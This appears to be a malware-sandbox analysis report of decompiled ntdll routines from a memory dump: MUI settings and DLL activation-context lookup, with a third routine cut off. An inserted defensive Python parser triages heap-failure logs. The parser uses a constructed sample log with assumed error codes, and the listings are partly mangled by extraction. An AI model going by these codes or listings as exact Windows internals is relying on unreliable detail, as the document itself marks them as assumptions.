                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: b394ff35433ed15574028a517b8a85dbfba3a3310f666b71155072d02c890dc3
                                                                      • Instruction ID: 7b883fb822d4feaf272dff26cbebbcebcecbb300f1bb68d48c43cce8101eb0f8
                                                                      • Opcode Fuzzy Hash: b394ff35433ed15574028a517b8a85dbfba3a3310f666b71155072d02c890dc3
                                                                      • Instruction Fuzzy Hash: 6161C736536145DFD21DAB49E989E2573F4EB04E24B0DC0AAF5096F311D774A8E08F0E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
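The decompiled routine above is ntdll's heap-failure reporter: it prefixes every line with "HEAP: " or "HEAP[<BaseDllName>]: " (taken from the first entry of the PEB loader list), then prints the faulting address and heap handle, the failure code with its name from the string table, up to three optional parameters, the last known valid blocks, and the address of a saved stack trace. The following parser, an added example that is not part of the analysis report or of ntdll, turns that debugger output into structured records and flags the failure classes that indicate real memory corruption (overrun, underrun, use after free, corrupted heap metadata) as opposed to API misuse. The sample log is constructed; the numeric code next to each name in it is an assumption, and the parser keys on the name only.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Failure names from the routine's string table that mean corrupted heap metadata
# or an out-of-bounds / after-free write, i.e. the exploitable class of bugs.
MEMORY_CORRUPTION_CODES = frozenset({
    "heap_failure_buffer_overrun",
    "heap_failure_buffer_underrun",
    "heap_failure_usage_after_free",
    "heap_failure_entry_corruption",
    "heap_failure_multiple_entries_corruption",
    "heap_failure_virtual_block_corruption",
    "heap_failure_freelists_corruption",
    "heap_failure_listentry_corruption",
    "heap_failure_lfh_bitmap_mismatch",
})

_HEX = r"(?:0x)?[0-9A-Fa-f]+"
# "HEAP: " when the PEB has no loader data yet, "HEAP[<BaseDllName>]: " otherwise.
_PREFIX = re.compile(r"^HEAP(?:\[(?P<image>[^\]]*)\])?:\s*(?P<body>.*)$")
# One regex per format string printed by the routine.
_HEADER = re.compile(rf"^Heap error detected at (?P<addr>{_HEX}) \(heap handle (?P<heap>{_HEX})\)$")
_CODE = re.compile(r"^Error code: (?P<num>\d+) - (?P<name>\S+)$")
_PARAM = re.compile(rf"^Parameter(?P<n>[123]): (?P<val>{_HEX})$")
_BLOCKS = re.compile(rf"^Last known valid blocks: before - (?P<before>{_HEX}), after - (?P<after>{_HEX})$")
_TRACE = re.compile(rf"^Stack trace available at (?P<val>{_HEX})$")


@dataclass
class HeapFailure:
    image: Optional[str] = None
    address: int = 0
    heap_handle: int = 0
    code: Optional[int] = None
    code_name: str = ""
    params: Dict[int, int] = field(default_factory=dict)  # only printed when non-zero
    before: Optional[int] = None
    after: Optional[int] = None
    stack_trace: Optional[int] = None

    def is_memory_corruption(self) -> bool:
        return self.code_name in MEMORY_CORRUPTION_CODES


def _hex(s: str) -> int:
    return int(s, 16)


def parse_heap_failures(lines: List[str]) -> List[HeapFailure]:
    """One HeapFailure per 'Heap error detected' header; unrelated lines are ignored."""
    reports: List[HeapFailure] = []
    cur: Optional[HeapFailure] = None
    for raw in lines:
        m = _PREFIX.match(raw.strip())
        if not m:
            continue
        image, body = m.group("image"), m.group("body")
        h = _HEADER.match(body)
        if h:
            cur = HeapFailure(image=image, address=_hex(h["addr"]), heap_handle=_hex(h["heap"]))
            reports.append(cur)
            continue
        if cur is None:
            continue  # detail line with no preceding header: nothing to attach it to
        if (c := _CODE.match(body)):
            cur.code, cur.code_name = int(c["num"]), c["name"]
        elif (p := _PARAM.match(body)):
            cur.params[int(p["n"])] = _hex(p["val"])
        elif (b := _BLOCKS.match(body)):
            cur.before, cur.after = _hex(b["before"]), _hex(b["after"])
        elif (t := _TRACE.match(body)):
            cur.stack_trace = _hex(t["val"])
    return reports


# Constructed debugger output (not from the report): a heap error in a hypothetical
# sample.exe, an unrelated line, then a benign failure printed before the loader
# list existed (plain "HEAP: " prefix, no parameter lines).
SAMPLE_LOG = """\
HEAP[sample.exe]: Heap error detected at 00C25F08 (heap handle 00C20000)
HEAP[sample.exe]: Error code: 6 - heap_failure_buffer_overrun
HEAP[sample.exe]: Parameter1: 00C25F00
HEAP[sample.exe]: Last known valid blocks: before - 00C25EC0, after - 00C25F40
HEAP[sample.exe]: Stack trace available at 7783D8C0
ModLoad: 77290000 77420000   ntdll.dll
HEAP: Heap error detected at 00D10000 (heap handle 00D00000)
HEAP: Error code: 9 - heap_failure_invalid_argument
HEAP: Stack trace available at 7783D8C0
"""


def triage(log: str) -> List[str]:
    """One summary line per failure, flagging those worth a memory-corruption investigation."""
    out = []
    for r in parse_heap_failures(log.splitlines()):
        tag = "MEMORY-CORRUPTION" if r.is_memory_corruption() else "benign/misuse"
        out.append(f"{r.image or '<no image>'}: {r.code_name} at {r.address:08X} [{tag}]")
    return out


if __name__ == "__main__":
    for line in triage(SAMPLE_LOG):
        print(line)
```

When a sandbox or debugger log contains this output for a sample, the "Last known valid blocks" pair brackets the corrupted chunk and Parameter1 is usually the block the heap was operating on, which is where to start when deciding whether the crash is a crude overflow or a deliberate heap-grooming failure.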

                                                                      C-Code - Quality: 96%
                                                                      			E01193D34(signed int* __ecx) {
                                                                      				signed int* _v8;
                                                                      				char _v12;
                                                                      				signed int* _v16;
                                                                      				signed int* _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int* _v48;
                                                                      				signed int* _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				char _v68;
                                                                      				signed int _t140;
                                                                      				signed int _t161;
                                                                      				signed int* _t236;
                                                                      				signed int* _t242;
                                                                      				signed int* _t243;
                                                                      				signed int* _t244;
                                                                      				signed int* _t245;
                                                                      				signed int _t255;
                                                                      				void* _t257;
                                                                      				signed int _t260;
                                                                      				void* _t262;
                                                                      				signed int _t264;
                                                                      				void* _t267;
                                                                      				signed int _t275;
                                                                      				signed int* _t276;
                                                                      				short* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int* _t280;
                                                                      				short* _t281;
                                                                      				signed int* _t282;
                                                                      				short* _t283;
                                                                      				signed int* _t284;
                                                                      				void* _t285;
                                                                      
                                                                      				_v60 = _v60 | 0xffffffff;
                                                                      				_t280 = 0;
                                                                      				_t242 = __ecx;
                                                                      				_v52 = __ecx;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_v40 = 0;
                                                                      				_v28 = 0;
                                                                      				_v32 = 0;
                                                                      				_v44 = 0;
                                                                      				_v56 = 0;
                                                                      				_t275 = 0;
                                                                      				_v16 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					_t280 = 0xc000000d;
                                                                      					_t140 = 0;
                                                                      					L50:
                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                      					_t242[0x13] = _t140;
                                                                      					_t242[0x16] = _v40;
                                                                      					_t242[0x18] = _v28;
                                                                      					_t242[0x14] = _v32;
                                                                      					_t242[0x17] = _t275;
                                                                      					_t242[0x15] = _v44;
                                                                      					_t242[0x11] = _v56;
                                                                      					_t242[0x12] = _v60;
                                                                      					return _t280;
                                                                      				}
                                                                      				if(E01191B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v56 = 1;
                                                                      					if(_v8 != 0) {
                                                                      						L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E01191B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v60 =  *_v8;
                                                                      					L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E01191B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      					L16:
                                                                      					if(E01191B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      						L28:
                                                                      						if(E01191B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      							L46:
                                                                      							_t275 = _v16;
                                                                      							L47:
                                                                      							_t161 = 0;
                                                                      							L48:
                                                                      							if(_v8 != 0) {
                                                                      								L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                      							}
                                                                      							_t140 = _v20;
                                                                      							if(_t140 != 0) {
                                                                      								if(_t275 != 0) {
                                                                      									L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                      									_t275 = 0;
                                                                      									_v28 = 0;
                                                                      									_t140 = _v20;
                                                                      								}
                                                                      							}
                                                                      							goto L50;
                                                                      						}
                                                                      						_t167 = _v12;
                                                                      						_t255 = _v12 + 4;
                                                                      						_v44 = _t255;
                                                                      						if(_t255 == 0) {
                                                                      							_t276 = _t280;
                                                                      							_v32 = _t280;
                                                                      						} else {
                                                                      							_t276 = L011A4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                      							_t167 = _v12;
                                                                      							_v32 = _t276;
                                                                      						}
                                                                      						if(_t276 == 0) {
                                                                      							_v44 = _t280;
                                                                      							_t280 = 0xc0000017;
                                                                      							goto L46;
                                                                      						} else {
                                                                      							E011CF3E0(_t276, _v8, _t167);
                                                                      							_v48 = _t276;
                                                                      							_t277 = E011D1370(_t276, 0x1164e90);
                                                                      							_pop(_t257);
                                                                      							if(_t277 == 0) {
                                                                      								L38:
                                                                      								_t170 = _v48;
                                                                      								if( *_v48 != 0) {
                                                                      									E011CBB40(0,  &_v68, _t170);
                                                                      									if(L011943C0( &_v68,  &_v24) != 0) {
                                                                      										_t280 =  &(_t280[0]);
                                                                      									}
                                                                      								}
                                                                      								if(_t280 == 0) {
                                                                      									_t280 = 0;
                                                                      									L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                      									_v44 = 0;
                                                                      									_v32 = 0;
                                                                      								} else {
                                                                      									_t280 = 0;
                                                                      								}
                                                                      								_t174 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                      								}
                                                                      								_v8 = _t280;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t243 = _v48;
                                                                      							do {
                                                                      								 *_t277 = 0;
                                                                      								_t278 = _t277 + 2;
                                                                      								E011CBB40(_t257,  &_v68, _t243);
                                                                      								if(L011943C0( &_v68,  &_v24) != 0) {
                                                                      									_t280 =  &(_t280[0]);
                                                                      								}
                                                                      								_t243 = _t278;
                                                                      								_t277 = E011D1370(_t278, 0x1164e90);
                                                                      								_pop(_t257);
                                                                      							} while (_t277 != 0);
                                                                      							_v48 = _t243;
                                                                      							_t242 = _v52;
                                                                      							goto L38;
                                                                      						}
                                                                      					}
                                                                      					_t191 = _v12;
                                                                      					_t260 = _v12 + 4;
                                                                      					_v28 = _t260;
                                                                      					if(_t260 == 0) {
                                                                      						_t275 = _t280;
                                                                      						_v16 = _t280;
                                                                      					} else {
                                                                      						_t275 = L011A4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                      						_t191 = _v12;
                                                                      						_v16 = _t275;
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						_v28 = _t280;
                                                                      						_t280 = 0xc0000017;
                                                                      						goto L47;
                                                                      					} else {
                                                                      						E011CF3E0(_t275, _v8, _t191);
                                                                      						_t285 = _t285 + 0xc;
                                                                      						_v48 = _t275;
                                                                      						_t279 = _t280;
                                                                      						_t281 = E011D1370(_v16, 0x1164e90);
                                                                      						_pop(_t262);
                                                                      						if(_t281 != 0) {
                                                                      							_t244 = _v48;
                                                                      							do {
                                                                      								 *_t281 = 0;
                                                                      								_t282 = _t281 + 2;
                                                                      								E011CBB40(_t262,  &_v68, _t244);
                                                                      								if(L011943C0( &_v68,  &_v24) != 0) {
                                                                      									_t279 =  &(_t279[0]);
                                                                      								}
                                                                      								_t244 = _t282;
                                                                      								_t281 = E011D1370(_t282, 0x1164e90);
                                                                      								_pop(_t262);
                                                                      							} while (_t281 != 0);
                                                                      							_v48 = _t244;
                                                                      							_t242 = _v52;
                                                                      						}
                                                                      						_t201 = _v48;
                                                                      						_t280 = 0;
                                                                      						if( *_v48 != 0) {
                                                                      							E011CBB40(_t262,  &_v68, _t201);
                                                                      							if(L011943C0( &_v68,  &_v24) != 0) {
                                                                      								_t279 =  &(_t279[0]);
                                                                      							}
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                      							_v28 = _t280;
                                                                      							_v16 = _t280;
                                                                      						}
                                                                      						_t202 = _v8;
                                                                      						if(_v8 != 0) {
                                                                      							L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                      						}
                                                                      						_v8 = _t280;
                                                                      						goto L28;
                                                                      					}
                                                                      				}
                                                                      				_t214 = _v12;
                                                                      				_t264 = _v12 + 4;
                                                                      				_v40 = _t264;
                                                                      				if(_t264 == 0) {
                                                                      					_v20 = _t280;
                                                                      				} else {
                                                                      					_t236 = L011A4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                      					_t280 = _t236;
                                                                      					_v20 = _t236;
                                                                      					_t214 = _v12;
                                                                      				}
                                                                      				if(_t280 == 0) {
                                                                      					_t161 = 0;
                                                                      					_t280 = 0xc0000017;
                                                                      					_v40 = 0;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E011CF3E0(_t280, _v8, _t214);
                                                                      					_t285 = _t285 + 0xc;
                                                                      					_v48 = _t280;
                                                                      					_t283 = E011D1370(_t280, 0x1164e90);
                                                                      					_pop(_t267);
                                                                      					if(_t283 != 0) {
                                                                      						_t245 = _v48;
                                                                      						do {
                                                                      							 *_t283 = 0;
                                                                      							_t284 = _t283 + 2;
                                                                      							E011CBB40(_t267,  &_v68, _t245);
                                                                      							if(L011943C0( &_v68,  &_v24) != 0) {
                                                                      								_t275 = _t275 + 1;
                                                                      							}
                                                                      							_t245 = _t284;
                                                                      							_t283 = E011D1370(_t284, 0x1164e90);
                                                                      							_pop(_t267);
                                                                      						} while (_t283 != 0);
                                                                      						_v48 = _t245;
                                                                      						_t242 = _v52;
                                                                      					}
                                                                      					_t224 = _v48;
                                                                      					_t280 = 0;
                                                                      					if( *_v48 != 0) {
                                                                      						E011CBB40(_t267,  &_v68, _t224);
                                                                      						if(L011943C0( &_v68,  &_v24) != 0) {
                                                                      							_t275 = _t275 + 1;
                                                                      						}
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                      						_v40 = _t280;
                                                                      						_v20 = _t280;
                                                                      					}
                                                                      					_t225 = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      					goto L16;
                                                                      				}
                                                                      			}
Instruction addresses for the decompiled lines above (the report's per-line address column, flattened by extraction into one value per line; reproduced here in the same order, compacted):

0x01193d3c 0x01193d42 0x01193d44 0x01193d46 0x01193d49 0x01193d4c 0x01193d4f 0x01193d52 0x01193d55 0x01193d58 0x01193d5b 0x01193d5f 0x01193d61 0x01193d66 0x011e8213 0x011e8218 0x01194085 0x01194088 0x0119408e 0x01194094 0x0119409a 0x011940a0 0x011940a6 0x011940a9 0x011940af 0x011940b6 0x011940bd 0x011940bd 0x01193d83 0x011e821f 0x011e8229 0x011e8238 0x011e8238 0x011e823d 0x011e823d 0x01193da0 0x01193daf 0x01193db5 0x01193dba 0x01193dba 0x01193dd4 0x01193e94 0x01193eab 0x01193f6d 0x01193f84 0x0119406b 0x0119406b 0x0119406e 0x0119406e 0x01194070 0x01194074 0x011e8351 0x011e8351 0x0119407a 0x0119407f 0x011e835d 0x011e8370 0x011e8377 0x011e8379 0x011e837c 0x011e837c 0x011e835d 0x00000000 0x0119407f 0x01193f8a 0x01193f8d 0x01193f90 0x01193f95 0x011e830d 0x011e830f 0x01193f9b 0x01193fac 0x01193fae 0x01193fb1 0x01193fb1 0x01193fb6 0x011e8317 0x011e831a 0x00000000 0x01193fbc 0x01193fc1 0x01193fc9 0x01193fd7 0x01193fda 0x01193fdd 0x01194021 0x01194021 0x01194029 0x01194030 0x01194044 0x01194046 0x01194046 0x01194044 0x01194049 0x011e8327 0x011e8334 0x011e8339 0x011e833c 0x0119404f 0x0119404f 0x0119404f 0x01194051 0x01194056 0x01194063 0x01194063 0x01194068 0x00000000 0x01194068 0x01193fdf 0x01193fe2 0x01193fe4 0x01193fe7 0x01193fef 0x01194003 0x01194005 0x01194005 0x0119400c 0x01194013 0x01194016 0x01194017 0x0119401b 0x0119401e 0x00000000 0x0119401e 0x01193fb6 0x01193eb1 0x01193eb4 0x01193eb7 0x01193ebc 0x011e82a9 0x011e82ab 0x01193ec2 0x01193ed3 0x01193ed5 0x01193ed8 0x01193ed8 0x01193edd 0x011e82b3 0x011e82b6 0x00000000 0x01193ee3 0x01193ee8 0x01193eed
                                                                      0x01193ef0
                                                                      0x01193ef3
                                                                      0x01193f02
                                                                      0x01193f05
                                                                      0x01193f08
                                                                      0x011e82c0
                                                                      0x011e82c3
                                                                      0x011e82c5
                                                                      0x011e82c8
                                                                      0x011e82d0
                                                                      0x011e82e4
                                                                      0x011e82e6
                                                                      0x011e82e6
                                                                      0x011e82ed
                                                                      0x011e82f4
                                                                      0x011e82f7
                                                                      0x011e82f8
                                                                      0x011e82fc
                                                                      0x011e82ff
                                                                      0x011e82ff
                                                                      0x01193f0e
                                                                      0x01193f11
                                                                      0x01193f16
                                                                      0x01193f1d
                                                                      0x01193f31
                                                                      0x011e8307
                                                                      0x011e8307
                                                                      0x01193f31
                                                                      0x01193f39
                                                                      0x01193f48
                                                                      0x01193f4d
                                                                      0x01193f50
                                                                      0x01193f50
                                                                      0x01193f53
                                                                      0x01193f58
                                                                      0x01193f65
                                                                      0x01193f65
                                                                      0x01193f6a
                                                                      0x00000000
                                                                      0x01193f6a
                                                                      0x01193edd
                                                                      0x01193dda
                                                                      0x01193ddd
                                                                      0x01193de0
                                                                      0x01193de5
                                                                      0x011e8245
                                                                      0x01193deb
                                                                      0x01193df7
                                                                      0x01193dfc
                                                                      0x01193dfe
                                                                      0x01193e01
                                                                      0x01193e01
                                                                      0x01193e06
                                                                      0x011e824d
                                                                      0x011e824f
                                                                      0x011e8254
                                                                      0x00000000
                                                                      0x01193e0c
                                                                      0x01193e11
                                                                      0x01193e16
                                                                      0x01193e19
                                                                      0x01193e29
                                                                      0x01193e2c
                                                                      0x01193e2f
                                                                      0x011e825c
                                                                      0x011e825f
                                                                      0x011e8261
                                                                      0x011e8264
                                                                      0x011e826c
                                                                      0x011e8280
                                                                      0x011e8282
                                                                      0x011e8282
                                                                      0x011e8289
                                                                      0x011e8290
                                                                      0x011e8293
                                                                      0x011e8294
                                                                      0x011e8298
                                                                      0x011e829b
                                                                      0x011e829b
                                                                      0x01193e35
                                                                      0x01193e38
                                                                      0x01193e3d
                                                                      0x01193e44
                                                                      0x01193e58
                                                                      0x011e82a3
                                                                      0x011e82a3
                                                                      0x01193e58
                                                                      0x01193e60
                                                                      0x01193e6f
                                                                      0x01193e74
                                                                      0x01193e77
                                                                      0x01193e77
                                                                      0x01193e7a
                                                                      0x01193e7f
                                                                      0x01193e8c
                                                                      0x01193e8c
                                                                      0x01193e91
                                                                      0x00000000
                                                                      0x01193e91

                                                                      Strings
                                                                      • WindowsExcludedProcs, xrefs: 01193D6F
                                                                      • Kernel-MUI-Language-SKU, xrefs: 01193F70
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 01193D8C
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 01193DC0
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01193E97
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 652b8e3c6cf39773946c6c1d8fe26a61c77af69991f2e8cfbcb1323a24684f35
                                                                      • Instruction ID: 0badbaa2a5d7e31d1caf2c38c9338235a2cd749c1c1a8c3a8ff26d2b999f2693
                                                                      • Opcode Fuzzy Hash: 652b8e3c6cf39773946c6c1d8fe26a61c77af69991f2e8cfbcb1323a24684f35
                                                                      • Instruction Fuzzy Hash: 52F16C76D00619EFCF19DFE8C980AEEBBB9FF08650F15005AE915A7650E7359E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E011B8E00(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v12;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t32;
                                                                      				intOrPtr _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      				signed int _t49;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				intOrPtr _t55;
                                                                      
                                                                      				_v8 =  *0x127d360 ^ _t52;
                                                                      				_t49 = 0;
                                                                      				_t48 = __ecx;
                                                                      				_t55 =  *0x1278464; // 0x75150110
                                                                      				if(_t55 == 0) {
                                                                      					L9:
                                                                      					if( !_t49 >= 0) {
                                                                      						if(( *0x1275780 & 0x00000003) != 0) {
                                                                      							E01205510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                      						}
                                                                      						if(( *0x1275780 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      					}
                                                                      					return E011CB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                      				}
                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                      				_t43 =  *0x1277984; // 0xd22b48
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                      					if(_t48 == _t43) {
                                                                      						_t50 = 0x5c;
                                                                      						if( *_t32 == _t50) {
                                                                      							_t46 = 0x3f;
                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                      								_t32 = _t32 + 8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t51 =  *0x1278464; // 0x75150110
                                                                      					 *0x127b1e0(_t47, _t32,  &_v12);
                                                                      					_t49 =  *_t51();
                                                                      					if(_t49 >= 0) {
                                                                      						L8:
                                                                      						_t35 = _v12;
                                                                      						if(_t35 != 0) {
                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                      								E011B9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                      								_t35 = _v12;
                                                                      							}
                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t49 != 0xc000008a) {
                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                      							if(_t49 != 0xc00000bb) {
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(( *0x1275780 & 0x00000005) != 0) {
                                                                      						_push(_t49);
                                                                      						E01205510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                      						_t53 = _t53 + 0x1c;
                                                                      					}
                                                                      					_t49 = 0;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}

                                                                      0x011b8e0f
                                                                      0x011b8e16
                                                                      0x011b8e19
                                                                      0x011b8e1b
                                                                      0x011b8e21
                                                                      0x011b8e7f
                                                                      0x011b8e85
                                                                      0x011f9354
                                                                      0x011f936c
                                                                      0x011f9371
                                                                      0x011f937b
                                                                      0x011f9381
                                                                      0x011f9381
                                                                      0x011f937b
                                                                      0x011b8e9d
                                                                      0x011b8e9d
                                                                      0x011b8e29
                                                                      0x011b8e2c
                                                                      0x011b8e38
                                                                      0x011b8e3e
                                                                      0x011b8e43
                                                                      0x011b8eb5
                                                                      0x011b8eb9
                                                                      0x011f92aa
                                                                      0x011f92af
                                                                      0x011f92e8
                                                                      0x011f92e8
                                                                      0x011f92af
                                                                      0x011b8eb9
                                                                      0x011b8e45
                                                                      0x011b8e53
                                                                      0x011b8e5b
                                                                      0x011b8e5f
                                                                      0x011b8e78
                                                                      0x011b8e78
                                                                      0x011b8e7d
                                                                      0x011b8ec3
                                                                      0x011b8ecd
                                                                      0x011b8ed2
                                                                      0x011b8ed2
                                                                      0x011b8ec5
                                                                      0x011b8ec5
                                                                      0x00000000
                                                                      0x011b8e7d
                                                                      0x011b8e67
                                                                      0x011b8ea4
                                                                      0x011f931a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011f9320
                                                                      0x011b8ea4
                                                                      0x011b8e70
                                                                      0x011f9325
                                                                      0x011f9340
                                                                      0x011f9345
                                                                      0x011f9345
                                                                      0x011b8e76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      Strings
                                                                      • LdrpFindDllActivationContext, xrefs: 011F9331, 011F935D
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 011F933B, 011F9367
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011F932A
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 011F9357
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: b69a29248bb4936cc87fe346d091d54a830b68debde0f669556db1822689499b
                                                                      • Instruction ID: a2ca4f3f7f019c8c2ad99ec6307dda5577e0f23314da7e47959f9b63036e9584
                                                                      • Opcode Fuzzy Hash: b69a29248bb4936cc87fe346d091d54a830b68debde0f669556db1822689499b
                                                                      • Instruction Fuzzy Hash: 5C41DA35A003359FDB3EAB1CD8CDBFAB6ADAB04E58F0A416DE90457151E770AD80C782
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E01198794(void* __ecx) {
                                                                      				signed int _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t77;
                                                                      				signed int _t80;
                                                                      				signed char _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				void* _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t103;
                                                                      				signed int _t105;
                                                                      				signed int _t110;
                                                                      				signed int _t118;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t134;
                                                                      				signed int _t136;
                                                                      				signed int _t143;
                                                                      				signed int* _t147;
                                                                      				signed int _t151;
                                                                      				void* _t153;
                                                                      				signed int* _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t161;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t153 = __ecx;
                                                                      				_t159 = 0;
                                                                      				_t121 = __ecx + 0x3c;
                                                                      				if( *_t121 == 0) {
                                                                      					L2:
                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
